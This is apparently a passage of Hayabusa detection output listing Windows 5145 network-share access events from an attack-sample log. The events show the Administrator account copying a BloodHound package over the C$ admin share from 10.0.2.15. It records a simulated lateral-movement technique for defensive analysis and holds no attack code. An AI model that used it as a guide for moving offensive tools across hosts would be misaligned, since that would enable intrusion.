10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.908 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.908 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\captors : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.918 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\classes : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.918 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\middlewares : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.918 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\misc : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.918 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\renderers : IP 
Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\listenercount : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\listenercount\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\locate-path : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\lodash : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.968 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\lodash\fp : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.978 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\loose-envify : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.988 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\make-dir : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.988 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : 
Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\md5-file : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.988 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimatch : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.988 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.998 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimist\example : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.998 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimist\test : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.008 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.008 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.008 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.008 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.018 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.018 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.018 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.028 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\dojo : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.028 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : 
Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\jquery : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.028 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\mootools : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.028 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\qooxdoo : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.038 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\yui3 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.038 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.038 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.038 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.048 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\lib\browser : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.048 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\lib\v1 : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.048 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\types : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.048 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\types\v1 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.058 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\node-ratify : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.058 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\object-assign : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.058 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\once : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.058 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.068 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.068 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.068 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: 
\??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\lib\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.068 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\lib\zlib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.078 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\path-exists : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.078 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\path-is-absolute : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.078 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pify : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.078 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pkg-up : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.088 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\p-limit : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.088 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\p-locate : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.088 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 
23:23:25.088 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.098 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.098 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj\types : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.098 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\process-nextick-args : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.098 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\prop-types : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.108 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\prop-types\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.108 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\p-try : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.108 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\punycode : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.119 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react : IP Address: 
